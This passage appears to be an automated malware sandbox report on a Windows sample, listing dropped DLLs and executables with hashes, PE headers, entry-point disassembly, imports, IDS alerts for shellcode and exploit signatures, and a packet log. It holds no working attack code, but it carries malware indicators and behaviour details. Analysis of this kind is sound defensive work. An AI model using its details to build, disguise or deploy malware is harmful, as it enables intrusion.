                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):8402
                                                                Entropy (8bit):3.7040792289652194
                                                                Encrypted:false
                                                                SSDEEP:192:R6l7wVeJQb6cC6Y2DXplSU99HgmfEfWprj89bJKYMsfbFjm:R6lXJE6R6YabSU99HgmfEvJKYffbs
                                                                MD5:C4516444EAD8AFDC3D39230B467B5AD7
                                                                SHA1:8833B29409A578C74581293BD826A7DDCE75069D
                                                                SHA-256:1CDC1E3164103A3F499D20E1A08C726C3C49035087F0E4AB3841441B47BBE8BA
                                                                SHA-512:F055329B7F32A015C20298E74A8C977F84F8AB70205730551B5678DB35FAC808AC3F7E9EBEE978905FCEB21F6A655BA0DB9AC5E2DDE33D79FF03E698703106A6
                                                                Malicious:false
                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.0.0.<./.P.i.
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):4674
                                                                Entropy (8bit):4.520215391796147
                                                                Encrypted:false
                                                                SSDEEP:48:cvIwWl8zsWJg77aI9I7WpW8VYaYm8M4JKt7SFb+q8kIgc2oV+2d:uIjfsI7KK7VSJK1Y7I2oV+2d
                                                                MD5:27BC5FDA67224C65D99BE87BF3D656B0
                                                                SHA1:00A1E4EC5898C7B71DAC5D1659633C8FE77C9BC5
                                                                SHA-256:59298D0F85ECBC592C6D0CF4A08444B28F16D8A799EB6A2F3B86842ED4EA7606
                                                                SHA-512:4C35471EB94049E61EFBC7DE020FB67FF8A9E6EC742963B570376267BCE85D8FE7136FBB11A1E4565F35693C483F12F830C683AE4D7FFF45087E9AFD248747FE
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426268" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):38896
                                                                Entropy (8bit):6.559102503083516
                                                                Encrypted:false
                                                                SSDEEP:768:CO+/dMq5EVz8TZvpEYixxqAMxkEhpdDGPrUf2hn:fYMq5kz8ppE7XIxTMUf+
                                                                MD5:DA33AD352674B718A8B1EBBB6D77A38B
                                                                SHA1:F2EF372864D39D4C7892F0DC3325233174B791DD
                                                                SHA-256:045C585B661C21ECDE016C752143F4B358C3131CC01C12420454037AE0F02813
                                                                SHA-512:79D1132D03C4E07BC11238E1E3B32447C00048732104B26CD890B161CABA92068141A50605C4A42E9B0614139D7EC786D3B52D6E1176EF0F4C828EBB4B755F01
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........wZ...4..4..4.n...4.I.5..4.I.1..4.I.0..4.I.7..4..n5..4..5..4.d.=..4.d.4..4.d....4.....4.d.6..4.Rich..4.................PE..L....).e...........!...'.....n............... ............................................@..........................%.......&..P....@...S...........|..........T....!..p............................ ..@............ ..|............................text...x........................... ..`.rdata..<.... ......................@..@.data........0......................@....rsrc....S...@...T...&..............@..@.reloc..T............z..............@..B................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):970912
                                                                Entropy (8bit):6.9649735952029515
                                                                Encrypted:false
                                                                SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                MD5:034CCADC1C073E4216E9466B720F9849
                                                                SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1659120
                                                                Entropy (8bit):6.598425597611016
                                                                Encrypted:false
                                                                SSDEEP:24576:aDPgc5j2oEEiq59Ry8naimjP/RPszWxkk9xx5x/luqxni0DRk70DRkctvdET5tG:1aiqNxaimjP/NNVrx5x/oek5tG
                                                                MD5:5F29A3A467D2B501FFDAC96E72665B83
                                                                SHA1:B60A014B8E99E331187723B93365E7FC76E0AB51
                                                                SHA-256:D66DD58752E43A523759327307490D62C56A9C8F7A04CE7B8BF3F2B5C1ACEAC9
                                                                SHA-512:1D3D6A8E85773079DDBB971E70AEC6A3F36A33FA582F65FA4B6E40AFDFEB35FDE87D568B268C3F54A802F8F352A09C5888E46F69A8B33166CAF7B94576E72DAB
                                                                Malicious:false
                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.........[............70?.......'.............to).......%.............to6.....to(.....to3.......%......................................#.......o.......&.....Rich....................PE..L....f[d.....................X....................@..........................p......H.....@..................................v...........................R...`..t.......8...............................@...............|............................text............................... ..`.rdata..............................@..@.data...............................@....rsrc................R..............@..@.reloc..t....`......................@..B........................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446840
                                                                Entropy (8bit):6.690279428020546
                                                                Encrypted:false
                                                                SSDEEP:12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
                                                                MD5:C766CA0482DFE588576074B9ED467E38
                                                                SHA1:5AC975CCCE81399218AB0DD27A3EFFC5B702005E
                                                                SHA-256:85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
                                                                SHA-512:EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.$...w...w...w.\.v...w.V@w...w..v...w...w...w..v...w..v...w..vD..w..v...w.,w...w..v...wRich...w........................PE..L....4.w.........."!...&.....z...............0.......................................=....@A.........................S......8c..........................xO.......4...U..T...........................8U..@............`..0............................text...b........................... ..`.data....&...0......................@....idata..0....`.......0..............@..@.rsrc................H..............@..@.reloc...4.......6...L..............@..B........................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1597304
                                                                Entropy (8bit):6.637291537967305
                                                                Encrypted:false
                                                                SSDEEP:24576:gzpjfQWnxImuy/53F9F2LZFTSnvZYfHfE0jr8HDYn8HyTdUZ8:g1zQUgVDjwHcn8STW8
                                                                MD5:66DF6F7B7A98FF750AADE522C22D239A
                                                                SHA1:F69464FE18ED03DE597BB46482AE899F43C94617
                                                                SHA-256:91E3035A01437B54ADDA33D424060C57320504E7E6A0C85DB2654815BA29C71F
                                                                SHA-512:48D4513E09EDD7F270614258B2750D5E98F0DBCE671BA41A524994E96ED3DF657FCE67545153CA32D2BF7EFCB35371CAE12C4264DF9053E4EB5E6B28014ED20E
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .y.A.*.A.*.A.*v.V*.A.*..L*.A.*..N*.A.*..q*.A.*..p*.A.*].u*8A.*.9.*.A.*.A.**A.*].p*.A.*].M*.A.*..J*.A.*.A.*.A.*].O*.A.*Rich.A.*................PE..L....N.Z...........!.........,.......................................................C....@..............................r...........................&..x9......tu......................................@............................................text...y........................... ..`.rdata..............................@..@.data...`........,...~..............@....rsrc...............................@..@.reloc..tu.......v..................@..B........................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):455328
                                                                Entropy (8bit):6.698367093574994
                                                                Encrypted:false
                                                                SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):91104
                                                                Entropy (8bit):6.919609919273454
                                                                Encrypted:false
                                                                SSDEEP:1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
                                                                MD5:9C133B18FA9ED96E1AEB2DA66E4A4F2B
                                                                SHA1:238D34DBD80501B580587E330D4405505D5E80F2
                                                                SHA-256:C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
                                                                SHA-512:D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................2........I..............o.......o.......o.......o.......o%......o......Rich............PE..L....s............"!...&............P........................................P...........@A........................@........ .......0...................O...@.......$..T............................#..@............ ...............................text...T........................... ..`.data...d...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                Category:dropped
                                                                Size (bytes):1835008
                                                                Entropy (8bit):4.469031489063945
                                                                Encrypted:false
                                                                SSDEEP:6144:WzZfpi6ceLPx9skLmb0fXZWSP3aJG8nAgeiJRMMhA2zX4WABluuNXjDH5S5:4ZHtXZWOKnMM6bFpJj45
                                                                MD5:D7BD65AA28BF9A4DA3E7FF31EC3AA535
                                                                SHA1:5CFF588A60CC69BD294E32F7858B91B799DE074B
                                                                SHA-256:13B6B3F0B399A49A37F43A706557B88E5E3D446B7AAD768920BB05FA2F480A54
                                                                SHA-512:1E17164112AEB38D1E7C35EF19182913DB1A7EBC404989D8D2D0551096A82F7AE778B0720A5A6F37717CDD711A3160FDDBD59D5266BD0CD7BE76BBF2D1693FB0
                                                                Malicious:false
                                                                Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....t.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                Entropy (8bit):6.259845390616407
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:LisectAVT_2403002B_78.exe
                                                                File size:916'089 bytes
                                                                MD5:89d61660f3e47a8a0f7ae37d5f8f03ed
                                                                SHA1:434a0f545d0aaafafc1bf5366f98187356e37a3a
                                                                SHA256:31c048f58d030f9c4ba84f5bf96ea182569b1d5468e41d9f3459b58a5df580b1
                                                                SHA512:61925a50f0aac3945bbdbd17f2dea89a4910b2c9df2326d3ff957cba5e1943ec81e53ae8f1936267e6f12ae2282fb781ddf9155ab752494c14fb90405935b070
                                                                SSDEEP:12288:AGU2dS5bIClU2BTx5KRZ18xtSP+szdcIugOO50MMEMOkPMQBy:ptShIr3mxtSP+sJ+O5FWPPl
                                                                TLSH:47158EC2B104C155FC3604334897BEBDE724AD618E38C59FB2947A3A59B1DB31632E7A
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................t.......t.o.............t.......Rich...........
                                                                Icon Hash:0934343034192609
                                                                Entrypoint:0x409fba
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows cui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x65F90D21 [Tue Mar 19 03:57:21 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:0
                                                                File Version Major:6
                                                                File Version Minor:0
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:0
                                                                Import Hash:1129ed3e7ca0eee59b4d31ab792ce61c
                                                                Signature Valid:
                                                                Signature Issuer:
                                                                Signature Validation Error:
                                                                Error Number:
                                                                Not Before, Not After
                                                                  Subject Chain
                                                                    Version:
                                                                    Thumbprint MD5:
                                                                    Thumbprint SHA-1:
                                                                    Thumbprint SHA-256:
                                                                    Serial:
                                                                    Instruction
                                                                    call 00007F5E7521671Ah
                                                                    jmp 00007F5E75216139h
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    mov eax, dword ptr [ebp+08h]
                                                                    push esi
                                                                    mov ecx, dword ptr [eax+3Ch]
                                                                    add ecx, eax
                                                                    movzx eax, word ptr [ecx+14h]
                                                                    lea edx, dword ptr [ecx+18h]
                                                                    add edx, eax
                                                                    movzx eax, word ptr [ecx+06h]
                                                                    imul esi, eax, 28h
                                                                    add esi, edx
                                                                    cmp edx, esi
                                                                    je 00007F5E752162DBh
                                                                    mov ecx, dword ptr [ebp+0Ch]
                                                                    cmp ecx, dword ptr [edx+0Ch]
                                                                    jc 00007F5E752162CCh
                                                                    mov eax, dword ptr [edx+08h]
                                                                    add eax, dword ptr [edx+0Ch]
                                                                    cmp ecx, eax
                                                                    jc 00007F5E752162CEh
                                                                    add edx, 28h
                                                                    cmp edx, esi
                                                                    jne 00007F5E752162ACh
                                                                    xor eax, eax
                                                                    pop esi
                                                                    pop ebp
                                                                    ret
                                                                    mov eax, edx
                                                                    jmp 00007F5E752162BBh
                                                                    push esi
                                                                    call 00007F5E75216BCDh
                                                                    test eax, eax
                                                                    je 00007F5E752162E2h
                                                                    mov eax, dword ptr fs:[00000018h]
                                                                    mov esi, 00438230h
                                                                    mov edx, dword ptr [eax+04h]
                                                                    jmp 00007F5E752162C6h
                                                                    cmp edx, eax
                                                                    je 00007F5E752162D2h
                                                                    xor eax, eax
                                                                    mov ecx, edx
                                                                    lock cmpxchg dword ptr [esi], ecx
                                                                    test eax, eax
                                                                    jne 00007F5E752162B2h
                                                                    xor al, al
                                                                    pop esi
                                                                    ret
                                                                    mov al, 01h
                                                                    pop esi
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    cmp dword ptr [ebp+08h], 00000000h
                                                                    jne 00007F5E752162C9h
                                                                    mov byte ptr [00438234h], 00000001h
                                                                    call 00007F5E752169BBh
                                                                    call 00007F5E75218BDFh
                                                                    test al, al
                                                                    jne 00007F5E752162C6h
                                                                    xor al, al
                                                                    pop ebp
                                                                    ret
                                                                    call 00007F5E75221736h
                                                                    test al, al
                                                                    jne 00007F5E752162CCh
                                                                    push 00000000h
                                                                    call 00007F5E75218BE6h
                                                                    pop ecx
                                                                    jmp 00007F5E752162ABh
                                                                    mov al, 01h
                                                                    pop ebp
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    cmp byte ptr [00438235h], 00000000h
                                                                    je 00007F5E752162C6h
                                                                    mov al, 01h
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x35e600x64.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x390000xa4b98.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xdd0000x2a70
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xde0000x1d24.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x33a2c0x38.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x33a680x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x280000x184.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x268180x26a00069323cbd6096c2dfe26414971c3c984False0.5521086165048543data6.5480366947810715IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x280000xe72c0xe800fba3d664abd52bc4ffce9198a5c25b58False0.5109105603448276data5.549848598637196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x370000x1d6c0x10002f8b31a80610d16b5baedfce4072667fFalse0.195068359375DOS executable (block device driver)3.1613628408255594IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x390000xa4b980xa4c005891201e166434420c09716c567a74c5False0.46551208033004554data5.950346350691132IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0xde0000x1d240x1e0063d0a330e3bba8539659b6fc60e463c0False0.7369791666666666data6.468727150283101IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    EXE0x5f6100x7e400PE32 executable (GUI) Intel 80386, for MS WindowsChineseChina0.5679648824257426
                                                                    RT_ICON0x395700x29d6PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedChineseChina0.8416433239962652
                                                                    RT_ICON0x3bf480x1305PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedChineseChina0.9542000410761964
                                                                    RT_ICON0x3d2500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584ChineseChina0.02658819354075476
                                                                    RT_ICON0x4da780x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016ChineseChina0.03726087870506622
                                                                    RT_ICON0x56f200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896ChineseChina0.05680207841284837
                                                                    RT_ICON0x5b1480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.07572614107883817
                                                                    RT_ICON0x5d6f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.10436210131332083
                                                                    RT_ICON0x5e7980x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400ChineseChina0.14262295081967213
                                                                    RT_ICON0x5f1200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.19946808510638298
                                                                    RT_GROUP_ICON0x5f5880x84dataChineseChina0.7121212121212122
                                                                    RT_VERSION0x393000x270dataChineseChina0.594551282051282
                                                                    RT_MANIFEST0xdda100x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                    DLLImport
                                                                    KERNEL32.dllSetPriorityClass, VirtualFree, GetCurrentProcess, VirtualAlloc, SetThreadPriority, Sleep, GetCurrentThread, GetSystemInfo, ExitProcess, GlobalMemoryStatusEx, GetConsoleWindow, CreateDirectoryA, WriteConsoleW, HeapSize, CreateFileW, GetProcessHeap, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, TerminateProcess, RtlUnwind, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetCommandLineA, GetCommandLineW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, GetFileSizeEx, SetFilePointerEx, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, CloseHandle, HeapAlloc, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, SetEndOfFile
                                                                    USER32.dllShowWindow
                                                                    SHELL32.dllSHChangeNotify, ShellExecuteA
                                                                    WININET.dllInternetCloseHandle, InternetOpenA, InternetReadFile, InternetOpenUrlA
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    ChineseChina
                                                                    EnglishUnited States
                                                                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                    2024-07-25T11:26:05.385881+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49725443192.168.2.652.168.117.173
                                                                    2024-07-25T11:26:28.058059+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972720.114.59.183192.168.2.6
                                                                    2024-07-25T11:25:42.841407+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected4434971443.152.64.193192.168.2.6
                                                                    2024-07-25T11:25:50.311485+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971720.114.59.183192.168.2.6
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jul 25, 2024 11:25:33.832099915 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:33.832140923 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:33.832264900 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:33.848781109 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:33.848809004 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:35.247145891 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:35.247272015 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:35.247917891 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:35.248095989 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:35.479018927 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:35.479054928 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:35.479456902 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:35.479528904 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:35.533324003 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:35.576507092 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:36.945822001 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:36.945887089 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:36.945894957 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:36.945930004 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:36.945955992 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:36.945982933 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:36.945996046 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:36.946033955 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:37.035761118 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:37.035804987 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:37.035881996 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:37.035907984 CEST4434971143.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:37.035943985 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:37.035959005 CEST49711443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:37.038045883 CEST4434971143.152.64.193192.168.2.6
